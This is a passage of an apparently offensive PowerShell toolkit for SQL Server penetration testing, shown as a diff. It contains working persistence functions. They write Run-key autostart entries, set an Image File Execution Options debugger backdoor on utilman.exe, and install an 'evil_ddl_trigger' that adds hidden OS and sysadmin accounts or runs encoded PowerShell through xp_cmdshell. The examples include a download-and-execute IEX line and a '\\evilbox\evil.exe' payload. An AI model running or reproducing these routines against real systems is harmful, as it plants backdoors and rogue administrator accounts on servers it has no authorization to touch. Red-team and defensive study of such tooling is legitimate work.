-Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblResults + } +} + + +#endregion + +######################################################################### +# +#region PERSISTENCE FUNCTIONS +# +######################################################################### + +# ---------------------------------- +# Get-SQLPersistRegRun +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLPersistRegRun +{ + <# + .SYNOPSIS + This function will use the xp_regwrite procedure to setup an + executable to automatically run when users log in. The specific registry key is. + HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run + Sysadmin privileges are required. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER Name + Registry value name. + .PARAMETER Command + Command to run. + + .Example + PS C:\> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command 'PowerShell.exe -C "Write-Host hacker | Out-File C:\temp\iamahacker.txt"' -Instance "SQLServer1\STANDARDDEV2014" + VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. + VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write value: PureEvil + VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: PowerShell.exe -C "Write-Host hacker | Out-File C:\temp\iamahacker.txt" + VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written. + VERBOSE: SQLServer1\STANDARDDEV2014 : Done. + + .Example + PS C:\> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command "\\evilbox\evil.exe" -Instance "SQLServer1\STANDARDDEV2014" + VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. + VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write value: PureEvil + VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: \\evilbox\evil.exe + VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written. + VERBOSE: SQLServer1\STANDARDDEV2014 : Done. + + .Notes + https://support.microsoft.com/en-us/kb/887165 + https://msdn.microsoft.com/en-us/library/aa940179(v=winembedded.5).aspx + http://sqlmag.com/t-sql/using-t-sql-manipulate-registry + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Name of the registry value.')] + [string]$Name = "Hacker", + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'The command to run.')] + [string]$Command = 'PowerShell.exe -C "Write-Host hacker | Out-File C:\temp\iamahacker.txt"', + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + + # Get SQL Server version number + $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber + if($SQLVersionFull) + { + $SQLVersionShort = $SQLVersionFull.Split('.')[0] + } + + # Check if this can actually run with the current login + if($IsSysadmin -ne "Yes") + { + Write-Verbose "$Instance : This function requires sysadmin privileges. Done." + Return + }else{ + + Write-Verbose "$Instance : Attempting to write value: $name" + Write-Verbose "$Instance : Attempting to write command: $command" + } + + # Setup query for registry update + $Query = " + --------------------------------------------- + -- Use xp_regwrite to configure + -- a file to execute sa command when users l + -- log into the system + ---------------------------------------------- + EXEC master..xp_regwrite + @rootkey = 'HKEY_LOCAL_MACHINE', + @key = 'Software\Microsoft\Windows\CurrentVersion\Run', + @value_name = '$Name', + @type = 'REG_SZ', + @value = '$Command'" + + # Execute query + $Results = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Setup query to verify the write is successful + $CheckQuery = " + ------------------------------------------------------------------------- + -- Get Windows Auto Login Credentials from the Registry + ------------------------------------------------------------------------- + -- Get AutoLogin Default Domain + DECLARE @CheckValue SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'Software\Microsoft\Windows\CurrentVersion\Run', + @value_name = N'$Name', + @value = @CheckValue output + + -- Display Results + SELECT CheckValue = @CheckValue" + + # Execute query + $CheckResults = Get-SQLQuery -Instance $Instance -Query $CheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CheckCommand = $CheckResults.CheckValue + if($CheckCommand.length -ge 2){ + Write-Verbose "$Instance : Registry entry written." + }else{ + Write-Verbose "$Instance : Fail to write to registry due to insufficient privileges." + } + } + + End + { + # Return message + Write-Verbose "$Instance : Done." + } +} + +# ---------------------------------- +# Get-SQLPersistRegDebugger +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLPersistRegDebugger +{ + <# + .SYNOPSIS + This function uses xp_regwrite to configure a debugger for a provided + executable (utilman.exe by default), which will run another provided + executable (cmd.exe by default) when it's called. It is commonly used + to create RDP backdoors. The specific registry key is + HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options[EXE]. + Sysadmin privileges are required. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER FileName + File to replace execution on. + .PARAMETER Command + Command to run. + + .Example + PS C:\> Get-SQLPersistRegDebugger-Verbose -FileName utilman.exe -Command 'c:\windows\system32\cmd.exe' -Instance "SQLServer1\STANDARDDEV2014" + VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. + VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write debugger for: utilman.exe + VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: c:\windows\system32\cmd.exe + VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written. + VERBOSE: SQLServer1\STANDARDDEV2014 : Done. + + .Example + PS C:\> Get-SQLPersistRegDebugger-Verbose -Name sethc.exe -Command "PowerShell.exe -C "Write-Host hacker | Out-File C:\temp\iamahacker.txt"" -Instance "SQLServer1\STANDARDDEV2014" + VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. + VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write debugger for: sethc.exe + VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: PowerShell.exe -C "Write-Host hacker | Out-File C:\temp\iamahacker.txt" + VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written. + VERBOSE: SQLServer1\STANDARDDEV2014 : Done. + + .Notes + http://sqlmag.com/t-sql/using-t-sql-manipulate-registry + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Name of the registry value.')] + [string]$FileName= "utilman.exe", + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'The command to run.')] + [string]$Command = 'c:\windows\system32\cmd.exe', + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get sysadmin status + $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin + + # Get SQL Server version number + $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber + if($SQLVersionFull) + { + $SQLVersionShort = $SQLVersionFull.Split('.')[0] + } + + # Check if this can actually run with the current login + if($IsSysadmin -ne "Yes") + { + Write-Verbose "$Instance : This function requires sysadmin privileges. Done." + Return + }else{ + + Write-Verbose "$Instance : Attempting to write debugger: $FileName" + Write-Verbose "$Instance : Attempting to write command: $Command" + } + + # Setup query for registry update + $Query = " + --- This will create a registry key through SQL Server (as sysadmin) + -- to run a defined debugger (any command) instead of intended command + -- in the example utilman.exe can be replace with cmd.exe and executed on demand via rdp + --- note: this could easily be a empire/other payload + EXEC master..xp_regwrite + @rootkey = 'HKEY_LOCAL_MACHINE', + @key = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$FileName', + @value_name = 'Debugger', + @type = 'REG_SZ', + @value = '$Command'" + + # Execute query + $Results = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Setup query to verify the write is successful + $CheckQuery = " + ------------------------------------------------------------------------- + -- Get Windows Auto Login Credentials from the Registry + ------------------------------------------------------------------------- + -- Get AutoLogin Default Domain + DECLARE @CheckValue SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$FileName', + @value_name = N'Debugger', + @value = @CheckValue output + + -- Display Results + SELECT CheckValue = @CheckValue" + + # Execute query + $CheckResults = Get-SQLQuery -Instance $Instance -Query $CheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + $CheckCommand = $CheckResults.CheckValue + if($CheckCommand.length -ge 2){ + Write-Verbose "$Instance : Registry entry written." + }else{ + Write-Verbose "$Instance : Fail to write to registry due to insufficient privileges." + } + } + + End + { + # Return message + Write-Verbose "$Instance : Done." + } +} + + +# ---------------------------------- +# Get-SQLPersistTriggerDDL +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLPersistTriggerDDL +{ + <# + .SYNOPSIS + This script can be used backdoor a Windows system using a SQL Server DDL event triggers. + + .DESCRIPTION + This script can be used backdoor a Windows system using a SQL Server DDL event triggers. + As a result, the associated TSQL will execute when any DDL_SERVER_LEVEL_EVENTS occur. This script supports the executing operating system + and PowerShell commands as the SQL Server service account using the native xp_cmdshell stored procedure. + The script also support add a new sysadmin. This script can be run as the current Windows user or a + SQL Server login can be provided. Note: This script requires sysadmin privileges. The DDL_SERVER_LEVEL_EVENTS include: + + CREATE DATABASE + ALTER DATABASE + DROP DATABASE + CREATE_ENDPOINT + ALTER_ENDPOINT + DROP_ENDPOINT + ADD_ROLE_MEMBER + DROP_ROLE_MEMBER + ADD_SERVER_ROLE_MEMBER + DROP_SERVER_ROLE_MEMBER + ALTER_AUTHORIZATION_SERVER + DENY_SERVER + GRANT_SERVER + REVOKE_SERVER + ALTER_LOGIN + CREATE_LOGIN + DROP_LOGIN + + Feel free to change "DDL_SERVER_LEVEL_EVENTS" to "DDL_EVENTS" if you want more coverage, but I haven't had time to test it. + + .EXAMPLE + Create a DDL trigger to add a new sysadmin. The example shows the script being run using a SQL Login. + + PS C:\> Get-SQLPersistTriggerDDL -SqlServerInstance "SERVERNAME\INSTANCENAME" -SqlUser MySQLAdmin -SqlPass MyPassword123! -NewSqlUser mysqluser -NewSqlPass NewPassword123! + + .EXAMPLE + Create a DDL trigger to add a local administrator to the Windows OS via xp_cmdshell. The example shows the script + being run as the current windows user. + + PS C:\> Get-SQLPersistTriggerDDL -SqlServerInstance "SERVERNAME\INSTANCENAME" -NewOsUser myosuser -NewOsPass NewPassword123! + + .EXAMPLE + Create a DDL trigger to run a PowerShell command via xp_cmdshell. The example below downloads a PowerShell script and + from the internet and executes it. The example shows the script being run as the current Windows user. + + PS C:\> Get-SQLPersistTriggerDDL -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')" + + .EXAMPLE + Remove evil_DDL_trigger as the current Windows user. + + PS C:\> Get-SQLPersistTriggerDDL -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -Remove + + .LINK + http://www.netspi.com + https://technet.microsoft.com/en-us/library/ms186582(v=sql.90).aspx + + .NOTES + Author: Scott Sutherland - 2016, NetSPI + #> + + [CmdletBinding()] + Param( + + [Parameter(Mandatory = $false, + HelpMessage = 'Username to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'Password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory=$false, + HelpMessage='Set username for new SQL Server sysadmin login.')] + [string]$NewSqlUser, + + [Parameter(Mandatory=$false, + HelpMessage='Set password for new SQL Server sysadmin login.')] + [string]$NewSqlPass, + + [Parameter(Mandatory=$false, + HelpMessage='Set username for new Windows local administrator account.')] + [string]$NewOsUser, + + [Parameter(Mandatory=$false, + HelpMessage='Set password for new Windows local administrator account.')] + [string]$NewOsPass, + + [Parameter(Mandatory=$false, + HelpMessage='Create trigger that will run the provide PowerShell command.')] + [string]$PsCommand, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory=$false, + HelpMessage='This will remove the trigger named evil_DDL_trigger create by this script.')] + [Switch]$Remove + ) + + # ----------------------------------------------- + # Setup database connection string + # ----------------------------------------------- + + # Create fun connection object + $conn = New-Object System.Data.SqlClient.SqlConnection + + # Set authentication type and create connection string + if($Username){ + + # SQL login / alternative domain credentials + Write-Verbose "$Instance : Attempting to authenticate to $Instance with SQL login $Username..." + $conn.ConnectionString = "Server=$Instance;Database=master;User ID=$Username;Password=$Password;" + [string]$ConnectUser = $Username + }else{ + + # Trusted connection + Write-Verbose "$Instance : Attempting to authenticate to $Instance as the current Windows user..." + $conn.ConnectionString = "Server=$Instance;Database=master;Integrated Security=SSPI;" + $UserDomain = [Environment]::UserDomainName + $DUsername = [Environment]::UserName + $ConnectUser = "$UserDomain\$DUsername" + } + + + # ------------------------------------------------------- + # Test database connection + # ------------------------------------------------------- + + try{ + $conn.Open() + Write-Verbose "$Instance : Connected." + $conn.Close() + }catch{ + $ErrorMessage = $_.Exception.Message + Write-Verbose "$Instance : Connection failed" + Write-Verbose "$Instance : Error: $ErrorMessage" + Break + } + + + # ------------------------------------------------------- + # Check if the user is a sysadmin + # ------------------------------------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "select is_srvrolemember('sysadmin') as sysstatus" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableIsSysAdmin = New-Object System.Data.DataTable + $TableIsSysAdmin.Load($results) + + # Check if current user is a sysadmin + $TableIsSysAdmin | Select-Object -First 1 sysstatus | foreach { + + $Checksysadmin = $_.sysstatus + if ($Checksysadmin -ne 0){ + Write-Verbose "$Instance : Confirmed Sysadmin access." + }else{ + Write-Verbose "$Instance : The current user does not have sysadmin privileges." + Write-Verbose "$Instance : Sysadmin privileges are required." + Break + } + } + + # Close db connection + $conn.Close() + + # ------------------------------------------------------- + # Enabled Show Advanced Options - needed for xp_cmdshell + # ------------------------------------------------------- + + # Status user + Write-Verbose "$Instance : Enabling 'Show Advanced Options', if required..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF (select value_in_use from sys.configurations where name = 'Show Advanced Options') = 0 + EXEC ('sp_configure ''Show Advanced Options'',1;RECONFIGURE')" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + + # ------------------------------------------------------- + # Enabled xp_cmdshell - needed for os commands + # ------------------------------------------------------- + + Write-Verbose "$Instance : Enabling 'xp_cmdshell', if required..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF (select value_in_use from sys.configurations where name = 'xp_cmdshell') = 0 + EXEC ('sp_configure ''xp_cmdshell'',1;RECONFIGURE')" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + + # ------------------------------------------------------- + # Check if the service account is local admin + # ------------------------------------------------------- + + Write-Verbose "$Instance : Checking if service account is a local administrator..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = @" + + -- Setup reg path + DECLARE @SQLServerInstance varchar(250) + if @@SERVICENAME = 'MSSQLSERVER' + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' + END + ELSE + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) + END + + -- Grab service account from service's reg path + DECLARE @ServiceaccountName varchar(250) + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @SQLServerInstance, + N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' + + DECLARE @MachineType SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', + @value_name = N'ProductType', + @value = @MachineType output + + -- Grab more info about the server + SELECT @ServiceAccountName as SvcAcct +"@ + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableServiceAccount = New-Object System.Data.DataTable + $TableServiceAccount.Load($results) + $SqlServeServiceAccountDirty = $TableServiceAccount | select SvcAcct -ExpandProperty SvcAcct + $SqlServeServiceAccount = $SqlServeServiceAccountDirty -replace '\.\\','' + + # Close db connection + $conn.Close() + + # Open db connection + $conn.Open() + + # Setup query + $Query = "EXEC master..xp_cmdshell 'net localgroup Administrators';" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableServiceAccountPriv = New-Object System.Data.DataTable + $TableServiceAccountPriv.Load($results) + + # Close db connection + $conn.Close() + + if($SqlServeServiceAccount -eq "LocalSystem" -or $TableServiceAccountPriv -contains "$SqlServeServiceAccount"){ + Write-Verbose "$Instance : The service account $SqlServeServiceAccount has local administrator privileges." + $SvcAdmin = 1 + }else{ + Write-Verbose "$Instance : The service account $SqlServeServiceAccount does NOT have local administrator privileges." + $SvcAdmin = 0 + } + + # ------------------- + # Setup the pscommand + # ------------------- + $Query_PsCommand = "" + if($PsCommand){ + + # Status user + Write-Verbose "$Instance : Creating encoding PowerShell payload..." + + # Check for local administrator privs + if($SvcAdmin -eq 0){ + Write-Verbose "$Instance : Note: PowerShell won't be able to take administrative actions due to the service account configuration." + } + + # This encoding method was based on a function by Carlos Perez + # https://raw.githubusercontent.com/darkoperator/Posh-SecMod/master/PostExploitation/PostExploitation.psm1 + + # Encode PowerShell command + $CmdBytes = [Text.Encoding]::Unicode.GetBytes($PsCommand) + $EncodedCommand = [Convert]::ToBase64String($CmdBytes) + + # Check if PowerShell command is too long + If ($EncodedCommand.Length -gt 8100) + { + Write-Verbose "PowerShell encoded payload is too long so the PowerShell command will not be added." + }else{ + + # Create query + $Query_PsCommand = "EXEC master..xp_cmdshell ''PowerShell -enc $EncodedCommand'';" + + Write-Verbose "$Instance : Payload generated." + } + }else{ + Write-Verbose "$Instance : Note: No PowerShell will be executed, because the parameters weren't provided." + } + + # ------------------- + # Setup newosuser + # ------------------- + $Query_OsAddUser = "" + if($NewOsUser){ + + # Status user + Write-Verbose "$Instance : Creating payload to add OS user..." + + # Check for local administrator privs + if($SvcAdmin -eq 0){ + + # Status user + Write-Verbose "$Instance : The service account does not have local administrator privileges so no OS admin can be created. Aborted." + Break + }else{ + + # Create query + $Query_OsAddUser = "EXEC master..xp_cmdshell ''net user $NewOsUser $NewOsPass /add & net localgroup administrators /add $NewOsUser'';" + + # Status user + Write-Verbose "$Instance : Payload generated." + } + }else{ + Write-Verbose "$Instance : Note: No OS admin will be created, because the parameters weren't provided." + } + + # ----------------------- + # Setup add sysadmin user + # ----------------------- + $Query_SysAdmin = "" + if($NewSqlUser){ + + # Status user + Write-Verbose "$Instance : Generating payload to add sysadmin..." + + # Create query + $Query_SysAdmin = "IF NOT EXISTS (SELECT * FROM sys.syslogins WHERE name = ''$NewSqlUser'') + exec(''CREATE LOGIN $NewSqlUser WITH PASSWORD = ''''$NewSqlPass'''';EXEC sp_addsrvrolemember ''''$NewSqlUser'''', ''''sysadmin'''';'')" + + # Status user + Write-Verbose "$Instance : Payload generated." + }else{ + Write-Verbose "$Instance : Note: No sysadmin will be created, because the parameters weren't provided." + } + + # ------------------------------------------------------- + # Create DDL trigger + # ------------------------------------------------------- + if(($NewSqlUser) -or ($NewOsUser) -or ($PsCommand)){ + # Status user + Write-Verbose "$Instance : Creating trigger..." + + # --------------------------- + # Create procedure + # --------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF EXISTS (SELECT * FROM sys.server_triggers WHERE name = 'evil_ddl_trigger') + DROP TRIGGER [evil_ddl_trigger] ON ALL SERVER + exec('CREATE Trigger [evil_ddl_trigger] + on ALL Server + For DDL_SERVER_LEVEL_EVENTS + AS + $Query_OsAddUser $Query_SysAdmin $Query_PsCommand')" + + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + Write-Verbose "$Instance : The evil_ddl_trigger trigger has been added. It will run with any DDL event." + }else{ + Write-Verbose "$Instance : No options were provided." + } + + # ------------------------------------------------------- + # REmove DDL trigger + # ------------------------------------------------------- + if($Remove){ + + # Status user + Write-Verbose "$Instance : Removing trigger named evil_DDL_trigger..." + + # --------------------------- + # Create procedure + # --------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF EXISTS (SELECT * FROM sys.server_triggers WHERE name = 'evil_ddl_trigger') + DROP TRIGGER [evil_ddl_trigger] ON ALL SERVER" + + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + Write-Verbose "$Instance : The evil_ddl_trigger trigger has been been removed." + } + + Write-Verbose "$Instance : All done." +} +#endregion + +######################################################################### +# +#region PRIVILEGE ESCALATION FUNCTIONS +# +######################################################################### + +# --------------------------------------- +# Template Function +# --------------------------------------- +# Author: Scott Sutherland +# Note: This is just a template for building other escalation functions. +Function Invoke-SQLAuditTemplate +{ + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't output anything.")] + [string]$NoOutput, + + [Parameter(Mandatory = $false, + HelpMessage = 'Exploit vulnerable issues.')] + [switch]$Exploit + ) + + Begin + { + # Table for output + $TblData = New-Object -TypeName System.Data.DataTable + $null = $TblData.Columns.Add('ComputerName') + $null = $TblData.Columns.Add('Instance') + $null = $TblData.Columns.Add('Vulnerability') + $null = $TblData.Columns.Add('Description') + $null = $TblData.Columns.Add('Remediation') + $null = $TblData.Columns.Add('Severity') + $null = $TblData.Columns.Add('IsVulnerable') + $null = $TblData.Columns.Add('IsExploitable') + $null = $TblData.Columns.Add('Exploited') + $null = $TblData.Columns.Add('ExploitCmd') + $null = $TblData.Columns.Add('Details') + $null = $TblData.Columns.Add('Reference') + $null = $TblData.Columns.Add('Author') + } + + Process + { + # Status User + Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: [VULNERABILITY NAME]" + + # Test connection to server + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if(-not $TestConnection) + { + # Status user + Write-Verbose -Message "$Instance : CONNECTION FAILED." + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: [VULNERABILITY NAME]." + Return + } + else + { + Write-Verbose -Message "$Instance : CONNECTION SUCCESS." + } + + # Grab server information + $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential + $CurrentLogin = $ServerInfo.CurrentLogin + $ComputerName = $ServerInfo.ComputerName + + # -------------------------------------------- + # Set function meta data for report output + # -------------------------------------------- + if($Exploit) + { + $TestMode = 'Exploit' + } + else + { + $TestMode = 'Audit' + } + $Vulnerability = '' + $Description = '' + $Remediation = '' + $Severity = '' + $IsVulnerable = 'No' + $IsExploitable = 'No' + $Exploited = 'No' + $ExploitCmd = "[CurrentCommand] -Instance $Instance -Exploit" + $Details = '' + $Reference = '' + $Author = 'First Last (Twitter), Company Year' + + # ----------------------------------------------------------------- + # Check for the Vulnerability + # Note: Typically a missing patch or weak configuration + # ----------------------------------------------------------------- + # $IsVulnerable = "No" or $IsVulnerable = "Yes" + + + # ----------------------------------------------------------------- + # Check for exploit dependancies + # Note: Typically secondary configs required for dba/os execution + # ----------------------------------------------------------------- + # $IsExploitable = "No" or $IsExploitable = "Yes" + + + # ----------------------------------------------------------------- + # Exploit Vulnerability + # Note: Add the current user to sysadmin fixed server role + # ----------------------------------------------------------------- + # $Exploited = "No" or $Exploited = "Yes" + + + # Add to report example + $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) + + # Status User + Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: [VULNERABILITY NAME]" + } + + End + { + # Return data + if ( -not $NoOutput) + { + Return $TblData + } + } +} + + +# ---------------------------------- +# Invoke-SQLImpersonateService +# ---------------------------------- +# Author: Mike Manzotti (@mmanzo_) and Scott Sutherland +Function Invoke-SQLImpersonateService +{ + <# + .PARAMETER Instance + This function can be used to impersonate a local SQL Server service account. + .EXAMPLE + PS C:\> Invoke-SQLImpersonateService -Instance SQLServer1\STANDARDDEV2014 -Verbose + VERBOSE: SQLServer1\STANDARDDEV2014 : Impersonating SQLServer1\STANDARDDEV2014 service account + VERBOSE: SQLServer1\STANDARDDEV2014 : - Process ID: 1234 + VERBOSE: SQLServer1\STANDARDDEV2014 : - Service Account: LocalSystem + + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'This can be used to revert to the original Windows user context.')] + [switch]$Rev2Self, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + } + + Process + { + + # Revert to original user context if flag is provided + if($Rev2Self){ + Invoke-TokenManipulation -RevToSelf | Out-Null + Return + } + + # Check for provide instance + if(-not $Instance){ + Write-Verbose "$Instance : No instance provided." + Return + } + + # Get current user name + $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name + + # Verify local administrator privileges + $IsAdmin = Get-SQLLocalAdminCheck + + # Return if the current user does not have local admin privs + if($IsAdmin -ne $true){ + write-verbose "$Instance : $WinCurrentUserName DOES NOT have local admin privileges." + return + 